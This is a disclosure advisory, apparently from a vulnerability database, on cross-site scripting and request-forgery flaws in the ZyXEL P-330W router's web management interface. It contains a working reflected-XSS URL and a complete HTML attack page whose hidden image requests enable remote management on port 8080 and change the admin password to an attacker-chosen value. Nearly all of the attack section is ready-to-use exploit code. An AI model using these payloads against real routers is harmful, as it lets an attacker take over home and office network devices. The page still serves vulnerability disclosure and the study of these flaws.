ZyXEL P-330W multiple XSS and XSRF vulnerabilities

2009-09-17 / 2009-09-18
Credit: santa_clause
Risk: High
Local: No
Remote: Yes

ZyXEL P-330W &#8220;Secure Wireless Internet Sharing Router&#8221; is vulnerable to multiple XSS and XSRF attacks. There are a plethora of XSS vulns in the web-based management interface so I'll leave it to you to discover these gifts on your own. Here is a starting point: http://<router_ip>:<router_port>/ping.asp?pingstr=&#8221;><script>alert("M erry Christams")</script> Additionally, no measures are taken to prevent XSRF so pretty much the whole web-based interface is vulnerable. Here is an example of a web page that if loaded by the victim, turns on remote router management on port 8080 and changes the admin password to "santa_pw": <html><head><title>Chirstmastime is Here</title></head><body> <img src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAccess =ON&remoteMgtPort=80 80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT hru3=& submit-url=%2Fremotemgt.asp" width="0" height="0"> <img src="http://<router_ip>:<router_port>/goform/formPasswordSetup?usern ame=admin&newpass=santa_pw &confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0"> </body> </html> Of course, for any of these attacks to be successful the victim has to be recently logged in to the router. Hope everyone has a Merry Christmas and please don't think Santa is a lamer because he posted XSS and XSRF (hey, I've been busy delivering toys all night and needed a little pick-me-up). Merry XSSmas, peace on earth, and this year, give the gift of input validation.

References:

http://www.securityfocus.com/bid/27024
http://secunia.com/advisories/28172
http://seclists.org/fulldisclosure/2007/Dec/0559.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top